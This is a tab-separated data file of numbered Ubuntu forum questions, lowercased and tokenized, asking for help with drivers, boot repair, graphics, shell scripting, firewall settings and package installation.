295507	repository to upgrade sigil to latest version on ( k ) ubuntu	i 'd like to upgrade sigil to the latest version ( currently it is 0.7.2 ) , and i 'm looking for a repository that provides it . the sigil website lists some repositories for various linux distros , but the ubuntu one ( the one i need ) does n't seems updated anymore ; from there , i can only get version 0.6.2 . there are some other repositories beside this one ? edit : i 'm using kubuntu 12.04 precise
295510	customizing ubuntu studio 13.04	i have recently switched from original ubuntu 12.10 to ubuntu studio 13.04 . after some research i found out i could install compiz to this as well . i have to go to the terminal and run compiz -- replace to get the changes i made to take effect , and even at that does n't seem like all features work like work space cube . i also noticed that when i activated compiz through terminal my tool bars on all my windows goes away . i heard i could install emerald windows manager to set windows and just add the command emerald -- replace in compiz under window decoration . however when i search for emerald nothing comes up in synaptics or ubuntu software center . i figure gnome tweak tools should let me set a theme to bring back my tool bars , but i am not positive this will work , or create more problems . i guess ubuntu studio uses xfce desktop while original ubuntu used gtk . can i install gtk to ubuntu studio just like i did with original ubuntu 12.10 to set themes to fix this problem ? has anyone else had the same problem with compiz on ubuntu studio with work space cube not working ?
295512	unauthorized remote access	i continue to be harassed by unauthorized remote access of my computers , even though i have done everything not to be on the internet . i just located sone files indicating that i have the following hardware i did not know i had : `` pci\ven_8086 & dev_3b20 and others . can these devices be used to for remote access ? i found this on a new computer i had built with express instructions that it was not to have any wireless capabilities . my limited research suggests i my have been duped . is this actual hardware that can be seen ? please help .
295515	how to export bash arrays ? any workaround tips ?	i am using the bash version 4.2.37 at ubuntu 12.10 . but since ubuntu 12.04 i am unable to export arrays in bash ... this is an example ( type these lines in the command line , it is not a script ) : export astr= ( a `` b c '' d ) declare -p |grep astr bash echo $ { astr [ @ ] } declare -p |grep astr echo outputs nothing ... declare -p |grep astr outputs nothing either ... what i am looking for is an workaround , because as far i know that is considered an known bash bug . edit : btw , if possible , the workaround could avoid creating temporary storage files for the array as i may run the same script simultaneously on different shells .
295516	an error occurred while mounting static	so you 've edited /etc/fstab , rebooted and get some error message about mounting static . what 's static ? turns out there 's an easy answer to this .
295519	lubuntu/lxde shortcuts broken	novice problem here : i 'm running lubuntu and on my desktop i 've created ( mangled ) two shortcuts ... i created them by right-clicking on the desktop and selecting create new ... > shortcut if i try to rename them , the first one is named `` teamspeak '' , but appears as `` teamspeak server '' when normally viewed from the desktop , and the second one is named `` a '' but appears as `` teamspeak '' when normally viewed from the desktop . after goofing around trying to make a script to fix mouse settings using a text file on the desktop , i can no longer summon the shortcut editor , nor open them in a text editor . for some reason , they are set to open with leafpad , but even then , nothing happens on double-click . i 'm pretty sure that the shortcuts were supposed to run shell scripts , and that i never got them to work before breaking them even more . running the shell scripts from the command line works fine . how do i get working shortcuts ( to shell scripts ) in lubuntu/lxde ?
295522	lubuntu/lxde desktop configuration files/desktop shortcuts	novice problem : i 'm running lubuntu and on my desktop i 've created ( mangled ) two shortcuts ... i created them by right-clicking on the desktop and selecting create new ... > shortcut if i try to rename them , the first one is named `` teamspeak '' , but appears as `` teamspeak server '' when normally viewed from the desktop , and the second one is named `` a '' but appears as `` teamspeak '' when normally viewed from the desktop . after goofing around trying to make a script to fix mouse settings using a text file on the desktop , i can no longer summon the shortcut editor , nor open them in a text editor . for some reason , they are set to open with leafpad , but even then , nothing happens on double-click . the shortcuts were supposed to run shell scripts , and i never got them to work before breaking them even more . running the shell scripts from the command line works fine . how do i get working shortcuts ( to shell scripts ) in lubuntu/lxde ?
295523	changing rm -r autocomplete behaviour for directories with whitespace in their name	i 'm running ubuntu 12.04 . if i try to auto-complete to delete a directory with spaces in the name , it does n't work . say my directory is called `` some spacey directory '' . if i type rm -r some and hit tab , nothing more autocompletes . so then i type a bit more , say rm -r some\ s. now if i hit tab , it autocompletes but removes the \ characters giving rm -r some spacey directory . this , however , wo n't delete some spacey directory . so that 's inconvenient . but when this is a real nightmare : if you have two directories , say `` basic '' and `` basic with an added feature '' and execute rm -r basic with an added feature you end up deleting basic . my question : is there any reason autocomplete has that behaviour ? is there anyway i can get rid of it ? this seems like dangerous behaviour in the context of a permanent delete command .
295524	boot issues with dual boot windows and ubuntu	i am facing an issue when i did following . initially my pc had windows 7 ultimate x64 installed . then i made it dual boot with ubuntu 12.04 x64 . everything used to work fine then . problem started when i upgraded windows 7 to windows 8 pro . after my upgrade i list grub loader . i was not getting any option to select os . then i googled the issue and somehow i do not remember exactly how , i fixed that issue . i am now getting os option at boot time . however sometimes usually after installing any updates in ubuntu i do not see grub loader at boot . sometimes it appears sometime is does not . i have figured out that this usually happens after ubuntu update . to fix that issue i run boot-repair and repair system with recommended button . this solves the issue temporarily until ubuntu update . by ubuntu update i do not mean ubuntu version upgrade , update means the security fixes and kind of stuff . my recent boot repair log can be found at : http : //paste.ubuntu.com/5666240/ i am not that much technically familiar with linux machines so any advice will be appreciated .
295526	gnome 3.8 / gdm / failed to load session `` gnome-classic ''	installed gnome 3.8 from its official ppa . installed gnome-shell gnome-shell-extensions and ubuntu-gnome-desktop . installation went smooth . also selected gdm as the login manager . the only thing that doesnt work is when i select from the login window `` gnome-classic '' , press login , quickly throws with `` failed to load session `` gnome-classic '' . os : ubuntu 13.04
295528	install matlab 2013a with error	i tried to install matlab2013a in my laptop ( ubuntu system ) . i download a iso file ( very big ) and followed their instruction : mount it and run `` install '' . but it returns me an error : can not locate java runtime enviroment ( jre ) . the directory ~/matlab/sys/java/jre/glnx86/jre does not exist . in the folder ~/matlab/sys/java/jre/ , what i have is `` glnxa64 '' . does that mean that i ca n't install this version of matlab in my 32bit laptop ? this java comes from matlab . how should i get it work ?
295533	ralink rt3573 chipset not working with ralink linux driver for that chipset . what now ?	so i have a netgear n900 usb adapter i wanted to use to obtain a wireless connection in the latest ubuntu system . i followed some instructions that i will post below in order to download a ralink driver for linux and make it . i called netgear to make sure that the chipset in the usb netowrk adapter is indeed the ralink rt3573 . it is . once i made the driver , the light on my usb adapter turned on and the networks in my range appeared . i selected my network , entered the wap password and pressed connect , it cycles through but never connects , and then asks for the password again . it will do this ad infinitum without ever connecting . so what do i need to do to secure the connection ? i am unsure if there is a problem with the driver or if it is related to network manager and a brand new update to ubuntu 12.10 . when i type in iwconfig this is the output : ra0 ralink sta essid : '' 11n-ap '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off link quality=100/100 signal level : -67 dbm noise level : -85 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . lsusb returns this : bus 001 device 004 : id 0846:9012 netgear , inc. wnda4100 802.11abgn 3x3:3 [ ralink rt3573 ] below is how i made the driver : props to chili555 who originally gave these instructions here : http : //ubuntuforums.org/archive/index.php/t-2089469.html except i had to tweak them some since the website where you get the driver has changed and the name of the folder extracted has since changed as well . you will need to download rt3573 usb here : http : //www.mediatek.com/_en/07_downloads/01-1_windowsdetail.php ? sn=5034 drag and drop it to your desktop . right-click it and select extract here . now we need to modify two files . navigate to os > linux ( you can also open home folder and click search and then type in the file names ) and open the file config.mk with a text editor such as gedit ( right-click > open with text editor ) . be certain these lines are set to =y : # support wpa_supplicant # i.e . wpa_supplicant -dralink has_wpa_supplicant=y # support native wpasupplicant for network maganger # i.e . wpa_supplicant -dwext has_native_wpa_supplicant_support=y proofread , save and close the text editor . now navigate to common and open rtusb_dev_id.c with a text editor . make the change i 've highlighted here : # endif /* rt35xx */ # ifdef rt3573 { usb_device ( 0x148f,0x3573 ) } , /* ralink 3573 */ { usb_device ( 0x7392,0x7733 ) } , /* edimax */ { usb_device ( 0x0846,0x9012 ) } , /* netgear */ { usb_device ( 0x0b05,0x17ad ) } , /*asus */ # endif /* rt3573 */ { } /* terminating entry */ all you are doing is adding the highlighted part . all else is unchanged . punctuation , spacing , brackets , etc . is crucial and must be exact . proofread , save and close the text editor . now we install the necessary build tools : sudo apt-get install build-essential linux-headers-generic now we compile the driver : cd ./desktop/20120911_rt3573_linux_sta_v2.5.0.0_rev1_dpo sudo su make make install modprobe rt3573sta exit your device should now be working . except it is n't , what do i do ?
295540	accidentaly deleted partition when installing ubuntu	as the title says i deleted my hdd partition while trying to install ubuntu 13.04 . i installed windows 7 to get a recovery software ( phoenix recovery ) i chose to recover after formatting but of course i didnt format it . i cant recover everything because when trying to recover certain pictures it crashes . ive tried other software and it still crashes . anyways , i heard about being able to recover from ubuntu but since im not a linux expert i dont want to mess up and lose the files ive recovered . i have installed ubuntu 13.04 on another hard drive .
295541	kernel panic error	hey guys i need a little help.. something has gone wrong with my laptop and now when i boot into ubuntu i get a kernel panic error . i am even unable to boot into recovery mode . i am trying to re-install the kernel through live cd by using following commands : sudo mkdir /mnt/temp sudo mount /dev/sdxy /mnt/temp # example : sudo mount /dev/sda5 /mnt/temp # run the next two commands only if you have a separate /boot partition sudo mkdir /mnt/temp/boot sudo mount /dev/sdxz /mnt/temp/boot # example : sudo mount /dev/sda6 /mnt/temp/boot # ( sda6 is the /boot partition ) for i in /dev /dev/pts /proc /sys ; do sudo mount -b $ i /mnt/temp $ i ; done sudo cp /etc/resolv.conf /mnt/temp/etc/resolv.conf # may be required to connect to the internet . sudo chroot /mnt/temp but at the last command of chroot i am getting error chroot : can not run command /bin/bash ' : exec format error i think it is happening because my versions of live cd and installed ubuntu are not same , but how can i find out the version of installed ubuntu ? please help me . if there is any other way i will be glad to check it out ! ! thanks in advanced ...
295546	ca n't get the resolution right even after installing the nvidia driver	i 'm sure my problem might seem simple to many of ya'all but for some reasons i 'm stuck with getting the right resolution for my newly installed ubuntu 10.04-64bit and i need some help . first of all , i do n't want to upgrade to newer ubuntu , that 's because i need to run some softwares which is well supported by 10.04 . i installed ubuntu 10.04 in my cpu . after installing , i checked `` hardware drivers '' for my graphics driver . unfortunately there were no drivers available then . so i installed it from `` synaptic package manager '' . the list of packages i installed are : -nvidia-current-dev -nvidia-current -nvidia-settings -nvidia-kernel-common -nvidia-common -nvidia-current-modaliases -nvidia-173-modaliases -nvidia-96-modaliases now i can see `` nvidia accelerated graphics driver ( version current ) [ recommended ] '' and `` this driver is activated and currently in use '' . but then for some reasons i ca n't get the resolutions right despite a reboot . did i miss anything here ? ? 'lspci ' command gives me : : vga compatible controller : nvidia corporation device 0e23 ( reva1 ) this is supposed to show me the driver model no , should n't it ? where did i go wrong ? what did i miss ? in fact i even tried some approaches described in some sites , still would n't work . any heads-up highly appreciated . thanks .
295550	ufw firewall operation	i have always run the program ufw as my firewall in ubuntu , and been satisifed with its performance . when i installed ubuntu 13.04 , and enabled ufw , i was not able to access the internet , and all ports were blocked . this is n't the behaviour i was expecting . i expect to reject all unsolicited packets , but allow ones requested by my computer . the way ufw functioned in ubuntu 10.04 i found to be satisfactory ( as an example ) . i do n't want to have to add a port 80 exception to access the internet , nor do i want port 80 open and responding to port-scans . how can i make ufw drop unsolicited packets , but accept packets requested by my computer ? i am using kernel 3.8 raring ringtail , and mate desktop 1.6 .
295551	walk through for installing flashcache . ubuntu 13.04	i have a new samsung laptop ( np700z5c ) , it has a 1tb hard drive , with 8gb ssd which under windows 8 was used for increasing performance , particularly boot up time . i understand that flashcache is an open source package that will allow me to do the same , but i 'm finding it difficult to figure out how . i found this page ( http : //www.gerrit-tamboer.net/ ) which was very informative but i failed at the final mount ( step 5 ) . instead i downloaded flashcache and flashcache-utils from the software center . but there does n't appear to be any instructions for the lay person about how to set it up . please could someone who has been successful provide some guidance , and if possible some step by step instructions ? [ more details on my failed attempt using the above link ... ] following the link above , i try to unmount /home , and am told that /home is not mounted . i believe /home is on /dev/sda1 so i unmount it instead . then i do : sudo flashcache_create -p thru cachedev /dev/sdb /dev//disk/by-uuid/ [ uuid address for/dev/sda1 ] and i have no warnings ! so i mount the new flashcache device : sudo mount /dev/mapper/cachedev /home and that works too . but now i ca n't cd to /home : cd bash : cd : /home/eddy : no such file or directory now mount /home wo n't work , and nor will mount /dev/sda1 . so i restart and none of my changes appear to have worked ( dmsetup gives me ubuntu -- vg-swap and ubuntu -- vg-root only ) . i 'd be very grateful for any guidance at all . thanks .
295552	windows & lubuntu remote desktop issues	i am new to linux and i have an issue i have installed lubuntu which i plan to use as a headless server so i need to be able to remote desktop into it however after installing sudo apt-get install xrdp and then using windows remote desktop connection in windows 8 i get the following screen after logging in using sesman-xvnc how can i get this so i can see the desktop normally i would just use teamviewer but iwant something i can use on my lan and also i can not set teamviewer to start on boot like i can in windows finally i did get it working using vino and tightvnc on windows but before i would connect it kept asking on the lubuntu screen to allow or deny someone accessing your computer is there a way to get this to auto-accept so i do n't have to accept on the other end this being the headless lubuntu server
295553	how can i extract sound drivers from suse for use in ubuntu ?	so i have a bit of a dilemma , i want to use ubuntu on my home desktop . the problem is that i use a fancy sound card that ubuntu does n't support . i use an ht omega striker 7.1 . the manufacturer only makes windows drivers . after an exhaustive amount of searching i have found two things . the first is that there is a forum post that has been repeated over and over again that is supposed to contain drivers for ubuntu but in fact only contains one uncompiled c source file that references a ton of other files that do n't come in the downloaded compressed file . so it is worthless . the second is that supposedly suse does support/work with my sound card . i am in the process of downloading opensuse to test this out . but in the mean time i would really like to know how , if it does in fact work via a live cd test , would i go about extracting that driver from opensuse and using it on ubuntu ? thanks !
295554	from livecd find the installed kernel version on ht hard disk	my ubuntu is not booting . the recovery mode also has a problem . when machine boots it says ubuntu linux 2.6.32-37 server but boot does not work . i tried using ubuntu 10.4 lts version iso and tried to boot from livecd . how to find out which version of os is installed on my machine from livecd . i am getting kernal panic not syncing attempted to kill init ! error . how to solve this problem . pl . suggest which livecd to use and how to solve this kernel panic error .
295559	how to add a new language definition for syntax highlighting in gedit ?	i 've attempted to create a new .lang file for getting gedit to recognize the julia programming language . i have read the tutorial , the reference document and the wiki page gedit/newlanguage , and i believe the file to be correct . however , upon restarting gedit after copying the new julia.lang file to /usr/share/gtksourceview-3.0/language-specs/ , a .jl file is indeed recognized and the syntax highlighting menu is set to julia , but no actual highlighting occurs . thinking that i might have done something wrong , i tried instead using an existent language file , for a similar language ( matlab ) , and only changed the header metadata into : < language id= '' julia '' _name= '' julia '' version= '' 2.0 '' _section= '' scientific '' > < metadata > < property name= '' mimetypes '' > text/x-julia ; application/x-julia < /property > < property name= '' globs '' > *.jl < /property > < property name= '' line-comment-start '' > # < /property > < /metadata > everything else was kept exactly as-is , and i saved the file as julia.lang . still , when reopening gedit the same issue occurs . what 's more , if i select the matlab entry from the syntax highlighting menu , the formatting is made correctly ( according to matlab rules ) , even though both matlab.lang and julia.lang have exactly the same syntax definitions ! what could i be doing wrong ? this guy seemed to have the same problem , but it was never revealed in that thread how he solved it ( if he ever did ) . any ideas ? update : my mistake was indeed not changing the context id as pointed out by @ carandraug in his answer . i did , however , have other issues which i 'll note here in case they 're of help to anyone : i reused the `` shell-like-comment '' definition from def.lang for julia 's single-line comments , but that was getting me a lot of errors . it turns out when a reference context is used , the id attribute can not be set . changing from < context ref= '' def : shell-like-comment '' / > to < context ref= '' def : shell-like-comment '' / > made the errors go away . i think the reference document ( and the tutorial as well ) should mention this caveat . i 've edited the wiki page to point this out . before i figured the problem with the comments context , i commented out its definition , but then i started getting a `` style 'def : string ' not defined '' error . when i uncommented the definition , this error disappeared . i 'm not sure what caused it in the first place ( considering that indeed a < style id= '' string '' > was defined in def.lang ) . any clarifications about this are welcome in the comments : ) a final suggestion to anyone developing new language highlight definitions for gedit : do n't forget to run gedit from the command line and look at the console output ! : )
295564	how do you sucessfuly use the uninstaller for ubuntu ?	i tried ubuntu , and i find that i am not using it . i would like to use the uninstaller provided by the installation program but i can not seem to get it to work . i am not a programmer and have limited ability with c prompt commands . at the very least i would like to change the boot order , and will be darned if i can not remember which f key to press ! i run windows 7
295569	mouse not recognized in usb port , but it does work through a hub in the same port	( ubuntu 13.04 ) if i connect my mouse in one usbv2 port on my laptop , it does not work . this is the output i get from dmesg : usb 1-1.2 : new full-speed usb device number 21 using ehci-pci usb 1-1.2 : device not accepting address 21 , error -32 usb 1-1.2 : new full-speed usb device number 22 using ehci-pci usb 1-1.2 : device not accepting address 22 , error -32 hub 1-1:1.0 : unable to enumerate usb device on port 2 now , if i plug in a usb hub in that same port , i get : usb 1-1.2 : new high-speed usb device number 23 using ehci-pci usb 1-1.2 : new usb device found , idvendor=1a40 , idproduct=0101 usb 1-1.2 : new usb device strings : mfr=0 , product=1 , serialnumber=0 usb 1-1.2 : product : usb 2.0 hub hub 1-1.2:1.0 : usb hub found hub 1-1.2:1.0 : 4 ports detected and , if i now plug the mouse in one of the ports of the hub i get : usb 1-1.2.1 : new full-speed usb device number 24 using ehci-pci usb 1-1.2.1 : new usb device found , idvendor=4168 , idproduct=1011 usb 1-1.2.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 usb 1-1.2.1 : product : targus wireless optical mouse usb 1-1.2.1 : manufacturer : reserved input : reserved targus wireless optical mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2.1/1-1.2.1:1.0/input/input15 hid-generic 0003:4168:1011.0005 : input , hiddev0 , hidraw0 : usb hid v1.11 mouse [ reserved targus wireless optical mouse ] on usb-0000:00:1a.0-1.2.1/input0 and the mouse works perfectly . well , i hope i can make the mouse work directly in the port without the hub . thanks in advance for any help !
295571	computer wo n't recognize me typing password	i installed linux os 4 and while it was doing its first update the laptop went into stand by . when i closed it and i opened the computer again it caused me to think the computer was off but it was just in standby . so i turned it off while it was installing the updates . when i turned it back on the wifi and touchpad did n't work . i have to use a physical mouse for it to work . i looked around a little and found a possible command for solving this : ( e : dpkg was interrupted ... run 'sudo dpkg -- configure -a ' ... ) but when i enter the command in the terminal it asks for : [ sudo ] password for admin : when i try to put my password in , the computer wo n't recognize that i am typingâ it .
295578	windows 8 not running after installing ubuntu	i have installed ubuntu 13.04 in my hp laptop alongside windows 8 but after installation , the bootloader failed to run windows 8 . i have windows 7 also in the other drive but ubuntu bootloader did not show the windows 7 . how to solve this problem ?
295579	configuring gmusicbrowser to copy now playing to x clipboard	i 'm trying to get gmusicbrowser to copy song information to my x.org clipboard with the now playing plugin . for on song change , in the plugin 's configuration , i have echo `` % a - % t ( from % l , % y ) '' | xclip -i -selection `` clip-board '' which shows echo as the command and every chunk as an argument ( e.g . `` ... '' is arg1 , | is arg2 , etc . ) ian @ iris : ~ $ echo -e `` test '' | xclip -i -selection `` clip-board '' ian @ iris : ~ $ xclip -o -selection `` clip-board '' test i 'm then able to see 'test ' as resulting from a paste into another window . however , when a song changes , this is n't the result ! i 'm running xubuntu 12.04.2 with gmusicbrowser 1.1.9-1
295580	ca n't access openstack dashboard	i get an error on my openstack dashboard . i used the scripted method to install openstack through devstack.com . it had only two commands ; i typed them down , and the rest of the installation finished by itself . when the installation was completed , i typed my ip address on another system , typed the user id and password , it opened , and in other words , it worked . yet when i rebooted the system where i installed openstack , i started getting errors . my user id and password were not allowed . how can i fix this ? is there something i 'm missing ?
295582	why wo n't ubuntu 13.04 load ? ( only wallpaper )	i just freshly installed 13.04 on an old hp 750n pavillion desktop computer , connected to a dell monitor . it has 512 mb ram . when i login , it shows only the desktop and mouse , with no toolbar , icons , windows , etc . what could be causing this ? thank you ! ben
295584	close current tab firefox using terminal	i have firefox already running on my system , and now in minimised state . what i want is to close the current tab running in firefox . how can i do this by simply using commands in terminal ?
295586	run script on remote machine via telnet ( not ssh )	i need to somehow run a script which resides on a remote machine running ubuntu . ssh or any other connection type that requires complex encryption is not possible . the client that will connect to the remote machine is only capable of opening a port and sending and receiving strings . can anyone tell me how to do this ?
295589	perl module set : :intervaltree is not installing	please help me resolve this issue . i am trying to install a perl module set : :intervaltree in ubuntu . i am repeatedly receiving the following error : cpan [ 1 ] > install set : :intervaltree cpan : storable loaded ok ( v2.20 ) going to read '/root/.cpan/metadata' database was generated on tue , 14 may 2013 05:29:04 gmt running install for module 'set : :intervaltree' cpan : yaml loaded ok ( v0.84 ) running make for b/be/benbooth/set-intervaltree-0.07.tar.gz cpan : digest : :sha loaded ok ( v5.47 ) cpan : compress : :zlib loaded ok ( v2.02 ) checksum for /root/.cpan/sources/authors/id/b/be/benbooth/set-intervaltree-0.07.tar.gz ok scanning cache /root/.cpan/build for sizes ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .done cpan : archive : :tar loaded ok ( v1.52 ) set-intervaltree-0.07/ set-intervaltree-0.07/src/ set-intervaltree-0.07/lib/ set-intervaltree-0.07/changes set-intervaltree-0.07/manifest set-intervaltree-0.07/t/ set-intervaltree-0.07/typemap set-intervaltree-0.07/perlobject.map set-intervaltree-0.07/intervaltree.xs set-intervaltree-0.07/makefile.pl set-intervaltree-0.07/readme set-intervaltree-0.07/meta.yml set-intervaltree-0.07/meta.json set-intervaltree-0.07/t/set-intervaltree.t set-intervaltree-0.07/lib/set/ set-intervaltree-0.07/lib/set/intervaltree.pm set-intervaltree-0.07/src/makefile set-intervaltree-0.07/src/interval_tree.h set-intervaltree-0.07/src/test_main.cc cpan : file : :temp loaded ok ( v0.22 ) cpan.pm : going to build b/be/benbooth/set-intervaltree-0.07.tar.gz checking if your kit is complete ... looks good writing makefile for set : :intervaltree writing mymeta.yml and mymeta.json cp lib/set/intervaltree.pm blib/lib/set/intervaltree.pm autosplitting blib/lib/set/intervaltree.pm ( blib/lib/auto/set/intervaltree ) /usr/bin/perl /usr/share/perl/5.10/extutils/xsubpp -c++ -typemap /usr/share/perl/5.10/extutils/typemap -typemap perlobject.map -typemap typemap intervaltree.xs > intervaltree.xsc & & mv intervaltree.xsc intervaltree.c c++ -c -isrc -d_reentrant -d_gnu_source -ddebian -fno-strict-aliasing -pipe -fstack-protector -i/usr/local/include -d_largefile_source -d_file_offset_bits=64 -g -o2 -dversion=\ '' 0.07\ '' -dxs_version=\ '' 0.07\ '' -fpic `` -i/usr/lib/perl/5.10/core '' -isrc intervaltree.c /bin/sh : c++ : not found make : *** [ intervaltree.o ] error 127 benbooth/set-intervaltree-0.07.tar.gz /usr/bin/make -- not ok running make test ca n't test without successful make running make install make had returned bad status , install seems impossible failed during this command : benbooth/set-intervaltree-0.07.tar.gz : make no cpan [ 2 ] >
295590	wireless adaptor problem after upgrade from 12.10 to 13.04	my wireless adapter was working probably after i used these two commands : sudo apt-get install linux-firmware-nonfree sudo modprobe -r b43 & & sudo modprobe b43 but when i upgrade to 13.04 , the command : sudo modprobe -r b43 & & sudo modprobe b43 ... is not working . i ran lshw -c network : lshw -c network warning : you should run this program as super-user . *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : efdfc000-efdfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff warning : output may be incomplete or inaccurate , you should run this program as super-user . please , i need some help .
295591	file operations not permitted on ntfs file system on thoshiba 1tb external hard disk in ubuntu 11.10	recently i buy a thoshiba external hard disk . and i make a ntfs partition . now it is read only mode in ubuntu 11.10 . now i ca n't able to copy from my system / create folder in hdd . but copying from external hdd is permitted ( writing is not permitted ) . could you please help to fix my bug ?
295598	upgrade to ubuntu 12.10 fails with calculation error	i wanted to upgrade to 13.04 and as a necessity i need to update to 12.10 . i have successfully updated in the past from ubuntu 10 to ubuntu 11 ans 12.04 . somehow , when i try from terminal or from update manager the update fails with shown in the following error . i have also submitted the bug report via launchpad . i do n't wish to update using dvd to save applications . any alternative ? have submitted as bug at bug launcpad
295604	steam and nvidia/optimus/crashes	i would like to share a solution to a problem i 've managed to reproduce on two systems with two different setups , the first setup ( will be refered to as a ) was an nvidia optimus setup with ubuntu 13.04 x64 . the second setup ( will be referred to as b ) was just an nvidia card with ubuntu 12.10 x64 . issues encountered on a were ; 1 ] games force closing when starting up ( eg loading screens ) 2 ] games not running on the nvidia card , or lagging . issues encountered on b were ; 1 ] games force closing when starting up .
295606	rhythmbox jumps to selected album	when rhythmbox finishes playing a song , it jumps to play the next song of the selected album . this is all well and good but the selected album may be different than the currently playing album , and i may not wish to play it - i may be merely browsing my library . i realize this is probably 'works as designed ' and not a bug - but it is really annoying and makes browsing the music library practically impossible for more than a length of a given song . i must browse back to the current album before the song finishes , or else it goes to play whatever is selected . is there any way around this ?
295614	when will the full ubuntu phone os release for galaxy nexus	does anyone know when will ubuntu be out for galaxy nexus
295626	how to make launcher icons visible ?	i just installed ubuntu . after starting up , the launcher icons are not visible . what to do ?
295627	compiz keybindings change on reboot	i have a problem with compiz keybindings on ubuntu 13.04 ( but it also existed on 12.10 ) . i run a multimonitor setup and use the put plugin to move windows from monitor to monitor with the `` put to next output '' -function . i have bound ctrl+alt+keypad comma to move the windows . when it works , the settings window looks like this : however , after rebooting , the key is changed to : ) the effect is that windows move as soon as i press ctrl+alt , but before i press comma . since i have many other keybindings relying on ctrl+alt , i very often accidentally move the window because i wanted to press another shortcut . i can fix the behavior manually by entering ccsm , removing and recreating the keyboard shortcut . i should mention that this problem does not occur for any other ctrl+alt based shortcuts ( for example in the grid plugin ) . how do i keep the shortcut persistent across reboots ?
295631	ubuntu 13.04 online accounts settings not opening	when i go to system settings and click on online accounts , the window for the settings shows up for about half a second before disappearing . why is this happening and how do i fix this ?
295633	ubuntu chromium browser - how to define zoom percentage via command line launch ?	i have chromium browser running as ubuntu desktop , when i launch my system i need to set the chromium browser zoom percentage to 79 % , so that it always remain default . using command line , how do i set that zoom percentage ? $ chromium-browser -- incognito -kiosk www.google.com
295637	v4l2 change default setting ?	i can successfully change the value of the setting i want with v4l2-ctl -- set-ctrl=exposure_auto_priority=1 but i want to know how to make that the default setting , the default is 0 , which leaves my webcam black , i need it to be default=1
295638	fixing windows 8 after removing ubuntu	i tried installing ubuntu ( successfully ) on my windows 8 machine so i could develop in c and it worked decently for a while . i did this without wubi . however , i later got a virtual machine to run ubuntu and did n't need the full dual boot install anymore . following a guide i found online ( i dont remember where ) , i simply deleted the 2 ubuntu partitions ( 1 was a main partition and the other was a swap area ) . when i rebooted my computer i was greeted with a grub rescue prompt . i have tried using both ubuntu 's boot-repair ( but only on recommended settings since i am kind of afraid to mess around with options i do n't know about ) and boot repair from my windows install disk ( both the automated repair and the bootrec command line options ) . the linux boot repair said it completed successfully but gave me a warning midway through which said something like `` efi detected . check the options . '' the both windows boot fixes said they completed successfully . i have also tried using supergrub to fix my bootloader . all of these wind up back at the grub rescue prompt . things that make this complicated : i have a lenovo y580 laptop which comes with 2 disks : a 30gb ssd ( i was told this was for booting and caching ) and a 750 gb hdd . the computer also came with windows 7 . i have since replaced the hdd with a 250gb ssd . and upgraded to windows 8 . as a result i am not entirely sure which drive windows 8 is stored on . can anyone help me fix my boot ? update : after trying to run windows bootrec commands again bootrec /fixmbr completes sucessfully , but bootrec /fixboot fails because `` element not found . ''
295639	ubuntu 12.10 unity launcher and status bar dissappeared after installing additional drivers	i have tried to use additional graphics drivers on lenovo t530 ubuntu 12.10 laptop . actually those drivers have not installed correctly . after restarting my machine , ubuntu launcher and status bar has gone . i have tried various suggestions but still could n't make it work.appreciate your help to regain the unity launcher and status bar . thanks , chanaka
295642	problem selecting vim version:	i use ubuntu 12.04 . i want to install the latest version of vim ( 7.3 ) with all its important plugins . so , which version of vim should i install ? : vim or vim-gnome or vim-athena or any other version ? please help ...
295644	security warning from facebook in chromium	i am terrified . every ten minutes chromium pops up with a tab stating : success security warning : please treat the url above as you would your password and do not share it with anyone . very confused as to how it got here , so i 've been running clamav . ran it fully on my home folder , and it found some ms viruses that i removed , and still nothing . i 'm wondering if it 's some sort of ubuntu dash applet that is trying to connect to facebook ? i 've changed my password on fb just to be sure , and nothing has changed . thanks for the help ? : (
295654	how can i run citrix receiver on 13.04 x64 ?	i am trying to install citrix receiver on ringtail and i seem to be having a dependency issue . i have installed the correct architecture , but it requires a separate install of open motif . openmotif install fails : `` dependency is not satisfiable : xlibs-dev . '' any ideas ? thanks in advance !
295658	how to fix grafic tearing on nvidia cards ?	i 've just installed ubuntu gnome 13.04 on my nvidia powered laptop and i 'm experiencing some ugly grafic tearing when watching videos or scrolling pages in firefox for instance ... vsync 's activated in the nvidia settings software and i tried both nouveau and proprietary drivers ( 304 , 310 and 313 ) with no luck so far . i 'm pretty sure it 's a known ( and old ... ) issue but i could n't find the reason nor the cure . any ideas ?
295662	video glitch nvidia ( card : unknown )	i have an asus desktop pc which is giving me an annoying video glitch if i check card model with lspci i get : vga compatible controller : nvidia corporation device 0de5 ( rev a1 ) apparently my ubuntu does n't know exactly me nvidia graphics card model , could that be my problem ? i currently have a nvidia geforce gt 530 on my pc . the driver i 'm using is the `` post-release updates '' . i 've also tried the recommended ones , and while the issue did n't go away , the pc seemed a bit slower . any advice ?
295666	how can i run `` grub-customizer '' on ubuntu 12:04	i need to clear up my start up screen and re-order . i have down loaded the grub-customizer apt but do n't know how to run it . any and all suggestions greatfully received
295667	retrive contents as files from everpad when sync does n't work	how can i retrieve all the contents from everpad to use in another user , syncing is not working though it says it have synced . edit : after another wrong decision , now i ca n't access the contents as i have revoked access to my evernote account : (
295669	x64 or x32 best for virtualbox to install windows 8 or 7	i have a lenovo g580 laptop , i work in it support and we need windows for work , so i would like to install ubuntu and use windows 8 in a virtual box . should i use x86 or x64 for better performance ?
